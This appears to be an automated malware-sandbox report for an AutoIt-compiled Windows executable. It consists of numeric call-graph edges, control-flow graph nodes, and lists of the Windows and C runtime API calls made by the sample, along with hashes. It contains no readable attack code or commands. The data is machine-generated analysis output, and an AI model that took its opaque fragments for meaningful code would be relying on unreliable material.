55726->55727 55729 931d61 55727->55729 55731 8c518c 48 API calls 55729->55731 55730->55695 55731->55725 55733 8c643d __ftell_nolock 55732->55733 55765 8c4c75 55733->55765 55735 8c6442 55736 8c3dee 55735->55736 55776 8c5928 86 API calls 55735->55776 55736->55703 55736->55704 55738 8c644f 55738->55736 55777 8c5798 88 API calls 55738->55777 55740 8c6458 55740->55736 55741 8c645c GetFullPathNameW 55740->55741 55742 8c6a63 48 API calls 55741->55742 55743 8c6488 55742->55743 55744 8c6a63 48 API calls 55743->55744 55745 8c6495 55744->55745 55746 935dcf _wcscat 55745->55746 55747 8c6a63 48 API calls 55745->55747 55747->55736 55749 8c3ed8 55748->55749 55750 931cba 55748->55750 55781 8c4024 55749->55781 55754 8c3e05 55755 8c36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 55754->55755 55755->55712 55756->55695 55757->55711 55759 8ef8a0 __ftell_nolock 55758->55759 55760 8c5381 GetModuleFileNameW 55759->55760 55761 8cce19 48 API calls 55760->55761 55762 8c53a7 55761->55762 55786 8c660f 55762->55786 55764 8c53b1 55764->55716 55766 8c4c8b 55765->55766 55771 8c4d94 55765->55771 55767 8df4ea 48 API calls 55766->55767 55766->55771 55768 8c4cb2 55767->55768 55769 8df4ea 48 API calls 55768->55769 55775 8c4d22 55769->55775 55770 8cb470 91 API calls 55770->55775 55771->55735 55775->55770 55775->55771 55778 8c4dd9 48 API calls 55775->55778 55779 909af1 48 API calls 55775->55779 55780 8cba85 48 API calls ___crtGetEnvironmentStringsW 55775->55780 55776->55738 55777->55740 55778->55775 55779->55775 55780->55775 55782 8c403c LoadImageW 55781->55782 55783 93418d EnumResourceNamesW 55781->55783 55784 8c3ee1 RegisterClassExW 55782->55784 55783->55784 55785 8c3f53 7 API calls 55784->55785 55785->55754 55787 8ef8a0 __ftell_nolock 55786->55787 55788 8c661c GetFullPathNameW 55787->55788 55789 8c6a63 48 API calls 55788->55789 55790 8c6643 55789->55790 55793 8c6571 55790->55793 55794 8c657f 55793->55794 55795 8cb18b 48 API calls 55794->55795 55796 8c658f 55795->55796 55796->55764 55797 90bb64 55798 90bb71 55797->55798 55799 90bb77 55797->55799 55800 8e1c9d _free 47 API calls 55798->55800 55801 8e1c9d _free 47 API calls 55799->55801 55803 90bb88 55799->55803 55800->55799 55801->55803 55802 90bb9a 55803->55802 55804 8e1c9d _free 47 API calls 55803->55804 55804->55802 55805 8c39db 55806 8c41a9 136 API calls 55805->55806 55807 8c39fe 55806->55807 55808 8c3a06 55807->55808 55809 90c396 122 API calls 55807->55809 55810 932fe4 55809->55810 55811 8c4252 84 API calls 55810->55811 55813 932ff0 55810->55813 55811->55813 55812 8e1c9d _free 47 API calls 55814 932ffd 55812->55814 55813->55812 55815 8c4252 84 API calls 55814->55815 55816 933006 55815->55816 55816->55816 55817 8d335a 55821 8d338a 55817->55821 55818 9394df 55819 939528 55818->55819 55868 90cc5c 86 API calls 3 library calls 55818->55868 55821->55818 55845 8d346c ___crtGetEnvironmentStringsW 55821->55845 55850 8c2b7a 55821->55850 55823 8d33ce 55824 8d3465 55823->55824 55825 93945e 55823->55825 55823->55845 55826 8df4ea 48 API calls 55824->55826 55865 90c942 50 API calls 55825->55865 55826->55845 55829 939438 55864 90cc5c 86 API calls 3 library calls 55829->55864 55832 9393c5 55849 8d3628 Mailbox 55832->55849 55863 8cd6e9 55 API calls 55832->55863 55833 8d351f 55839 8d3540 55833->55839 55866 8c6eed 48 API calls 55833->55866 55836 8df4ea 48 API calls 55836->55845 55840 9394b0 55839->55840 55843 8d3585 55839->55843 55839->55849 55867 8cdcae 50 API calls Mailbox 55840->55867 55842 8d3615 55857 8cdcae 50 API calls Mailbox 55842->55857 55843->55818 55843->55842 55843->55849 55845->55829 55845->55832 55845->55833 55845->55836 55846 939394 55845->55846 55845->55849 55858 8cd9a0 53 API calls __cinit 55845->55858 55859 8cd8c0 53 API calls 55845->55859 55860 9080e3 53 API calls 55845->55860 55861 8cd764 55 API calls 55845->55861 55862 8cdcae 50 API calls Mailbox 55845->55862 55847 8df4ea 48 API calls 55846->55847 55847->55832 55851 8c2b8b 55850->55851 55852 93436a 55850->55852 55853 8df4ea 48 API calls 55851->55853 55854 8c2b92 55853->55854 55855 8c2bb3 55854->55855 55869 8c2bce 48 API calls 55854->55869 55855->55823 55857->55849 55858->55845 55859->55845 55860->55845 55861->55845 55862->55845 55863->55829 55864->55849 55865->55833 55866->55839 55867->55818 55868->55819 55869->55855 55870 8dc75a 55871 8cd7f7 48 API calls 55870->55871 55872 8dc7c8 55871->55872 55877 8dd26c 55872->55877 55875 8dc865 55876 8dc881 55875->55876 55880 8dd1fa 48 API calls ___crtGetEnvironmentStringsW 55875->55880 55881 8dd298 55877->55881 55880->55875 55882 8dd28b 55881->55882 55883 8dd2a5 55881->55883 55882->55875 55883->55882 55884 8dd2ac RegOpenKeyExW 55883->55884 55884->55882 55885 8dd2c6 RegQueryValueExW 55884->55885 55886 8dd2fc RegCloseKey 55885->55886 55887 8dd2e7 55885->55887 55886->55882 55887->55886 55888 8d0ad5 55893 8d0ae0 Mailbox ___crtGetEnvironmentStringsW 55888->55893 55889 8df4ea 48 API calls 55889->55893 55890 93a706 55894 90cc5c 86 API calls 3 library calls 55890->55894 55892 93a71f Mailbox 55893->55889 55893->55890 55893->55892 55894->55892 55895 8ded15 55896 8ded2d 55895->55896 55897 8dedc5 VirtualProtect 55896->55897 55898 8ded93 55896->55898 55897->55898 55899 8ddd94 55900 8df4ea 48 API calls 55899->55900 55901 8ddd9c 55900->55901 55902 8dddb0 55901->55902 55906 8ddf3d 55901->55906 55907 8ddda8 55906->55907 55908 8ddf46 55906->55908 55910 8dddc0 55907->55910 55938 8e0f0a 52 API calls __cinit 55908->55938 55911 8cd7f7 48 API calls 55910->55911 55912 8dddd7 GetVersionExW 55911->55912 55913 8c6a63 48 API calls 55912->55913 55914 8dde1a 55913->55914 55939 8ddfb4 55914->55939 55917 8c6571 48 API calls 55921 8dde2e 55917->55921 55919 9324c8 55921->55919 55943 8ddf77 55921->55943 55922 8ddea4 GetCurrentProcess 55952 8ddf5f LoadLibraryA GetProcAddress 55922->55952 55923 8ddebb 55924 8ddf31 GetSystemInfo 55923->55924 55925 8ddee3 55923->55925 55927 8ddf0e 55924->55927 55946 8de00c 55925->55946 55930 8ddf1c FreeLibrary 55927->55930 55931 8ddf21 55927->55931 55930->55931 55931->55902 55932 8ddf29 GetSystemInfo 55934 8ddf03 55932->55934 55933 8ddef9 55949 8ddff4 55933->55949 55934->55927 55937 8ddf09 FreeLibrary 55934->55937 55937->55927 55938->55907 55940 8ddfbd 55939->55940 55941 8cb18b 48 API calls 55940->55941 55942 8dde22 55941->55942 55942->55917 55953 8ddf89 55943->55953 55957 8de01e 55946->55957 55950 8de00c 2 API calls 55949->55950 55951 8ddf01 GetNativeSystemInfo 55950->55951 55951->55934 55952->55923 55954 8ddea0 55953->55954 55955 8ddf92 LoadLibraryA 55953->55955 55954->55922 55954->55923 55955->55954 55956 8ddfa3 GetProcAddress 55955->55956 55956->55954 55958 8ddef1 55957->55958 55959 8de027 LoadLibraryA 55957->55959 55958->55932 55958->55933 55959->55958 55960 8de038 GetProcAddress 55959->55960 55960->55958 55961 8c4a30 55962 8c4a40 __ftell_nolock 55961->55962 55963 8cd7f7 48 API calls 55962->55963 55964 8c4af6 55963->55964 55965 8c5374 50 API calls 55964->55965 55966 8c4aff 55965->55966 55981 8c363c 55966->55981 55969 8c518c 48 API calls 55970 8c4b18 55969->55970 55987 8c64cf 55970->55987 55973 8cd7f7 48 API calls 55974 8c4b32 55973->55974 55993 8c49fb 55974->55993 55976 8c4b43 55977 8c61a6 48 API calls 55980 8c4b3d _wcscat __wsetenvp 55977->55980 55978 8cce19 48 API calls 55978->55980 55979 8c64cf 48 API calls 55979->55980 55980->55976 55980->55977 55980->55978 55980->55979 55982 8c3649 __ftell_nolock 55981->55982 56007 8c366c GetFullPathNameW 55982->56007 55984 8c365a 55985 8c6a63 48 API calls 55984->55985 55986 8c3669 55985->55986 55986->55969 55988 8c651b 55987->55988 55992 8c64dd ___crtGetEnvironmentStringsW 55987->55992 55991 8df4ea 48 API calls 55988->55991 55989 8df4ea 48 API calls 55990 8c4b29 55989->55990 55990->55973 55991->55992 55992->55989 56009 8cbcce 55993->56009 55996 8c4a2b 55996->55980 55997 9341cc RegQueryValueExW 55998 934246 RegCloseKey 55997->55998 55999 9341e5 55997->55999 56000 8df4ea 48 API calls 55999->56000 56001 9341fe 56000->56001 56002 8c47b7 48 API calls 56001->56002 56003 934208 RegQueryValueExW 56002->56003 56004 934224 56003->56004 56005 93423b 56003->56005 56006 8c6a63 48 API calls 56004->56006 56005->55998 56006->56005 56008 8c368a 56007->56008 56008->55984 56010 8cbce8 56009->56010 56011 8c4a0a RegOpenKeyExW 56009->56011 56012 8df4ea 48 API calls 56010->56012 56011->55996 56011->55997 56013 8cbcf2 56012->56013 56014 8dee75 48 API calls 56013->56014 56014->56011 56015 8cec51 56038 8cf110 56015->56038 56017 8ce94c PeekMessageW 56036 8ce920 56017->56036 56018 8cebc7 56019 8de244 TranslateAcceleratorW 56019->56036 56020 8ced21 PeekMessageW 56020->56036 56021 8ddc5f 2 API calls 56021->56036 56023 8cedae timeGetTime 56090 8c1caa 49 API calls 56023->56090 56024 8ced3a TranslateMessage DispatchMessageW 56024->56020 56025 8cebf7 timeGetTime 56025->56036 56027 8df4ea 48 API calls 56027->56036 56028 935420 56030 935445 Sleep 56028->56030 56031 935429 56028->56031 56030->56018 56031->56030 56032 935432 Sleep 56031->56032 56032->56030 56035 8cce19 48 API calls 56035->56036 56036->56017 56036->56018 56036->56019 56036->56020 56036->56021 56036->56023 56036->56024 56036->56025 56036->56027 56036->56028 56036->56035 56037 8cd6e9 55 API calls 56036->56037 56088 8ceed0 94 API calls Mailbox 56036->56088 56089 8cef00 88 API calls 56036->56089 56091 928d23 48 API calls 56036->56091 56092 8c1caa 49 API calls 56036->56092 56037->56036 56041 8cf130 56038->56041 56039 8cf3dd 56042 9387c8 56039->56042 56049 8cf3f2 56039->56049 56066 8cf431 Mailbox 56039->56066 56040 8cf595 56045 8cd7f7 48 API calls 56040->56045 56040->56066 56043 8cf199 56041->56043 56095 90cc5c 86 API calls 3 library calls 56041->56095 56098 90cc5c 86 API calls 3 library calls 56042->56098 56043->56039 56043->56040 56048 8cd7f7 48 API calls 56043->56048 56069 8cf229 56043->56069 56047 9387a3 56045->56047 56097 8e0f0a 52 API calls __cinit 56047->56097 56052 938772 56048->56052 56068 8cf418 56049->56068 56099 909af1 48 API calls 56049->56099 56051 938b1b 56058 938bcf 56051->56058 56051->56066 56096 8e0f0a 52 API calls __cinit 56052->56096 56056 938c53 56111 90cc5c 86 API calls 3 library calls 56056->56111 56057 938810 56100 91eef8 218 API calls 56057->56100 56108 90cc5c 86 API calls 3 library calls 56058->56108 56059 938beb 56109 91bdbd 122 API calls Mailbox 56059->56109 56066->56056 56066->56059 56071 8cfce0 56066->56071 56076 90cc5c 86 API calls 56066->56076 56086 8cf537 Mailbox 56066->56086 56093 8cdd47 48 API calls ___crtGetEnvironmentStringsW 56066->56093 56094 8cd6e9 55 API calls 56066->56094 56106 8f97ed InterlockedDecrement 56066->56106 56112 8dc1af 48 API calls 56066->56112 56067 938c00 56067->56086 56110 90cc5c 86 API calls 3 library calls 56067->56110 56068->56051 56068->56066 56070 8cf6aa 56068->56070 56069->56039 56069->56040 56069->56066 56069->56068 56070->56066 56070->56071 56070->56086 56105 8dc1af 48 API calls 56070->56105 56071->56086 56107 90cc5c 86 API calls 3 library calls 56071->56107 56073 938823 56073->56068 56077 93884b 56073->56077 56076->56066 56101 91ccdc 48 API calls 56077->56101 56079 938857 56081 938865 56079->56081 56082 9388aa 56079->56082 56102 909b72 48 API calls 56081->56102 56082->56086 56103 90a69d 48 API calls 56082->56103 56085 9388e7 56104 8cbc74 48 API calls 56085->56104 56086->56036 56088->56036 56089->56036 56090->56036 56091->56036 56092->56036 56093->56066 56094->56066 56095->56043 56096->56069 56097->56066 56098->56086 56099->56057 56100->56073 56101->56079 56102->56086 56103->56085 56104->56086 56105->56066 56106->56066 56107->56086 56108->56086 56109->56067 56110->56086 56111->56086 56112->56066

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 322 8eb043-8eb080 call 8ef8a0 325 8eb089-8eb08b 322->325 326 8eb082-8eb084 322->326 328 8eb0ac-8eb0d9 325->328 329 8eb08d-8eb0a7 call 8e7bda call 8e7c0e call 8e6e10 325->329 327 8eb860-8eb86c call 8ea70c 326->327 332 8eb0db-8eb0de 328->332 333 8eb0e0-8eb0e7 328->333 329->327 332->333 336 8eb10b-8eb110 332->336 337 8eb0e9-8eb100 call 8e7bda call 8e7c0e call 8e6e10 333->337 338 8eb105 333->338 340 8eb11f-8eb12d call 8f3bf2 336->340 341 8eb112-8eb11c call 8ef82f 336->341 368 8eb851-8eb854 337->368 338->336 353 8eb44b-8eb45d 340->353 354 8eb133-8eb145 340->354 341->340 355 8eb7b8-8eb7d5 WriteFile 353->355 356 8eb463-8eb473 353->356 354->353 358 8eb14b-8eb183 call 8e7a0d GetConsoleMode 354->358 362 8eb7d7-8eb7df 355->362 363 8eb7e1-8eb7e7 GetLastError 355->363 359 8eb55a-8eb55f 356->359 360 8eb479-8eb484 356->360 358->353 372 8eb189-8eb18f 358->372 370 8eb565-8eb56e 359->370 371 8eb663-8eb66e 359->371 366 8eb48a-8eb49a 360->366 367 8eb81b-8eb833 360->367 369 8eb7e9 362->369 363->369 373 8eb4a0-8eb4a3 366->373 374 8eb83e-8eb84e call 8e7c0e call 8e7bda 367->374 375 8eb835-8eb838 367->375 379 8eb85e-8eb85f 368->379 377 8eb7ef-8eb7f1 369->377 370->367 378 8eb574 370->378 371->367 376 8eb674 371->376 380 8eb199-8eb1bc GetConsoleCP 372->380 381 8eb191-8eb193 372->381 382 8eb4e9-8eb520 WriteFile 373->382 383 8eb4a5-8eb4be 373->383 374->368 375->374 384 8eb83a-8eb83c 375->384 385 8eb67e-8eb693 376->385 387 8eb856-8eb85c 377->387 388 8eb7f3-8eb7f5 377->388 389 8eb57e-8eb595 378->389 379->327 390 8eb1c2-8eb1ca 380->390 391 8eb440-8eb446 380->391 381->353 381->380 382->363 394 8eb526-8eb538 382->394 392 8eb4cb-8eb4e7 383->392 393 8eb4c0-8eb4ca 383->393 384->379 395 8eb699-8eb69b 385->395 387->379 388->367 397 8eb7f7-8eb7fc 388->397 398 8eb59b-8eb59e 389->398 401 8eb1d4-8eb1d6 390->401 391->388 392->373 392->382 393->392 394->377 402 8eb53e-8eb54f 394->402 403 8eb69d-8eb6b3 395->403 404 8eb6d8-8eb719 WideCharToMultiByte 395->404 406 8eb7fe-8eb810 call 8e7c0e call 8e7bda 397->406 407 8eb812-8eb819 call 8e7bed 397->407 399 8eb5de-8eb627 WriteFile 398->399 400 8eb5a0-8eb5b6 398->400 399->363 410 8eb62d-8eb645 399->410 408 8eb5cd-8eb5dc 400->408 409 8eb5b8-8eb5ca 400->409 412 8eb1dc-8eb1fe 401->412 413 8eb36b-8eb36e 401->413 402->366 414 8eb555 402->414 415 8eb6c7-8eb6d6 403->415 416 8eb6b5-8eb6c4 403->416 404->363 418 8eb71f-8eb721 404->418 406->368 407->368 408->398 408->399 409->408 410->377 422 8eb64b-8eb658 410->422 424 8eb217-8eb223 call 8e1688 412->424 425 8eb200-8eb215 412->425 426 8eb375-8eb3a2 413->426 427 8eb370-8eb373 413->427 414->377 415->395 415->404 416->415 420 8eb727-8eb75a WriteFile 418->420 428 8eb75c-8eb776 420->428 429 8eb77a-8eb78e GetLastError 420->429 422->389 431 8eb65e 422->431 446 8eb269-8eb26b 424->446 447 8eb225-8eb239 424->447 432 8eb271-8eb283 call 8f40f7 425->432 434 8eb3a8-8eb3ab 426->434 427->426 427->434 428->420 437 8eb778 428->437 440 8eb794-8eb796 429->440 431->377 449 8eb289 432->449 450 8eb435-8eb43b 432->450 435 8eb3ad-8eb3b0 434->435 436 8eb3b2-8eb3c5 call 8f5884 434->436 435->436 442 8eb407-8eb40a 435->442 436->363 455 8eb3cb-8eb3d5 436->455 437->440 440->369 445 8eb798-8eb7b0 440->445 442->401 452 8eb410 442->452 445->385 451 8eb7b6 445->451 446->432 453 8eb23f-8eb254 call 8f40f7 447->453 454 8eb412-8eb42d 447->454 456 8eb28f-8eb2c4 WideCharToMultiByte 449->456 450->369 451->377 452->450 453->450 464 8eb25a-8eb267 453->464 454->450 458 8eb3fb-8eb401 455->458 459 8eb3d7-8eb3ee call 8f5884 455->459 456->450 460 8eb2ca-8eb2f0 WriteFile 456->460 458->442 459->363 467 8eb3f4-8eb3f5 459->467 460->363 463 8eb2f6-8eb30e 460->463 463->450 466 8eb314-8eb31b 463->466 464->456 466->458 468 8eb321-8eb34c WriteFile 466->468 467->458 468->363 469 8eb352-8eb359 468->469 469->450 470 8eb35f-8eb366 469->470 470->458
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 978f36e9f7692232c95d2ae74eabf6bc1990aa34c718bc2635601a528e3270af
                                                                                                                                                        • Instruction ID: ab47a111a730d5958d9a3ac3fcb6092f4b8d5dd99abbbe0fbc9821f4fdaaca96
                                                                                                                                                        • Opcode Fuzzy Hash: 978f36e9f7692232c95d2ae74eabf6bc1990aa34c718bc2635601a528e3270af
                                                                                                                                                        • Instruction Fuzzy Hash: 1A325D75B122688BDB248F19DC816EAB7B5FF47314F1841E9E40AE7A91D7309E80CF52
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00932F49), ref: 00906CB9
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00906CCA
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00906CDA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 48322524-0
                                                                                                                                                        • Opcode ID: ef0e11e9d37231566a6094a29f45fd376752a46a11b36cdda678b08ff14022e8
                                                                                                                                                        • Instruction ID: c3a4b9c878c0384332912052eff898e856dbdf7044a79f895596eda7cfc3c687
                                                                                                                                                        • Opcode Fuzzy Hash: ef0e11e9d37231566a6094a29f45fd376752a46a11b36cdda678b08ff14022e8
                                                                                                                                                        • Instruction Fuzzy Hash: 72E0D8398294209BD2186738EC0D8E937ACDA0A339F100709FAF1C11D0E770E91056D5
                                                                                                                                                        APIs
                                                                                                                                                        • ___createFile.LIBCMT ref: 008F5EC3
                                                                                                                                                        • ___createFile.LIBCMT ref: 008F5F04
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 008F5F2D
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 008F5F34
                                                                                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 008F5F47
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 008F5F6A
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 008F5F73
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 008F5F7C
                                                                                                                                                        • __set_osfhnd.LIBCMT ref: 008F5FAC
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 008F6016
                                                                                                                                                        • __close_nolock.LIBCMT ref: 008F603C
                                                                                                                                                        • __chsize_nolock.LIBCMT ref: 008F606C
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 008F607E
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 008F6176
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 008F618B
                                                                                                                                                        • __close_nolock.LIBCMT ref: 008F61EB
                                                                                                                                                          • Part of subcall function 008EEA9C: CloseHandle.KERNELBASE(00000000,0096EEF4,00000000,?,008F6041,0096EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008EEAEC
                                                                                                                                                          • Part of subcall function 008EEA9C: GetLastError.KERNEL32(?,008F6041,0096EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008EEAF6
                                                                                                                                                          • Part of subcall function 008EEA9C: __free_osfhnd.LIBCMT ref: 008EEB03
                                                                                                                                                          • Part of subcall function 008EEA9C: __dosmaperr.LIBCMT ref: 008EEB25
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 008F620D
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 008F6342
                                                                                                                                                        • ___createFile.LIBCMT ref: 008F6361
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008F636E
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 008F6375
                                                                                                                                                        • __free_osfhnd.LIBCMT ref: 008F6395
                                                                                                                                                        • __invoke_watson.LIBCMT ref: 008F63C3
                                                                                                                                                        • __wsopen_helper.LIBCMT ref: 008F63DD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3896587723-2766056989
                                                                                                                                                        • Opcode ID: b390181eede2d66df72b8ed5a63229f524dc5f4ee06bd8ca163bb732a5652191
                                                                                                                                                        • Instruction ID: e12eeb7f0e5a57bdc35d2f934b4f9e86df024a7053145e4d79226f2b19492343
                                                                                                                                                        • Opcode Fuzzy Hash: b390181eede2d66df72b8ed5a63229f524dc5f4ee06bd8ca163bb732a5652191
                                                                                                                                                        • Instruction Fuzzy Hash: 3B22367190460E9BEB299F78CC45BBD7B61FB41324F284228E721EB2E2E7358D60D751

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • _wcscpy.LIBCMT ref: 0090FA96
                                                                                                                                                        • _wcschr.LIBCMT ref: 0090FAA4
                                                                                                                                                        • _wcscpy.LIBCMT ref: 0090FABB
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090FACA
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090FAE8
                                                                                                                                                        • _wcscpy.LIBCMT ref: 0090FB09
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 0090FBE6
                                                                                                                                                        • _wcscpy.LIBCMT ref: 0090FC0B
                                                                                                                                                        • _wcscpy.LIBCMT ref: 0090FC1D
                                                                                                                                                        • _wcscpy.LIBCMT ref: 0090FC32
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090FC47
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090FC59
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090FC6E
                                                                                                                                                          • Part of subcall function 0090BFA4: _wcscmp.LIBCMT ref: 0090C03E
                                                                                                                                                          • Part of subcall function 0090BFA4: __wsplitpath.LIBCMT ref: 0090C083
                                                                                                                                                          • Part of subcall function 0090BFA4: _wcscpy.LIBCMT ref: 0090C096
                                                                                                                                                          • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0A9
                                                                                                                                                          • Part of subcall function 0090BFA4: __wsplitpath.LIBCMT ref: 0090C0CE
                                                                                                                                                          • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0E4
                                                                                                                                                          • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0F7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                                                        • Opcode ID: 5c807a655878618738ab63b09989ea0ab72e36e40be4a42fd793ef120ef699a6
                                                                                                                                                        • Instruction ID: 08855314d98d7c4067c0dac7d753000ffeb0c2e3c47ed51f7a1bb8d6e8284e60
                                                                                                                                                        • Opcode Fuzzy Hash: 5c807a655878618738ab63b09989ea0ab72e36e40be4a42fd793ef120ef699a6
                                                                                                                                                        • Instruction Fuzzy Hash: 1A91A272504345AFDB20EB58C851F9AB3E8FF84310F04896DF999D7292DB74EA44CB92

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
